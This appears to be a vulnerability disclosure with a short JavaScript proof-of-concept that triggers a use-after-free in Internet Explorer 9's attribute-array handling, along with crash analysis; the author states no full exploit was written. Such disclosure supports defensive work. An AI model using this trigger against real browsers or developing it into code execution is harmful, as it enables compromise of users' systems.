A specially crafted web-page can cause Microsoft Internet Explorer 9 to reallocate a memory buffer in order to grow it in size. The original buffer will be copied to newly allocated memory and then freed. The code continues to use the freed copy of the buffer.
Microsoft Internet Explorer 9
<script> // This PoC attempts to exploit a use-after-free bug in Microsoft Internet // Explorer 9 // See http://blog.
skylined. nl/20161101001. html for details. oTextArea = document.createElement('textarea'); oTextArea. dataSrc = 1; oTextArea. id = 1; oTextArea. innerHTML = 1; oTextArea. onvolumechange = 1; oTextArea. style. setProperty('list-style', "url()"); // This work by SkyLined is licensed under a Creative Commons // Attribution-Non-Commercial 4. 0 International License. </script>
CAttrArray object initially allocates a
CImplAry buffer of 0x40 bytes,
which can store 4 attributes. When the buffer is full, it is grown to 0x60
bytes. A new buffer is allocated at a different location in memory and the
contents of the original buffer is copied there. The repro causes the code to
do this, but the code continues to access the original buffer after it has been
If an attacker was able to cause MSIE to allocate 0x40 bytes of memory and have some control over the contents of this memory before MSIE reuses the freed memory, there is a chance that this issue could be used to execute arbitrary code. I did not attempt to write an exploit for this vulnerability myself.
dll!ParseListStyleProperty Arbitrary~FE0 AVR(3986463A) description: Security: Attempt to read from unallocated arbitrary memory (@0x12D11FE0) in MSHTML. dll!ParseListStyleProperty note: The exception happens in the main process. Based on this information, this is expected to be a critical security issue!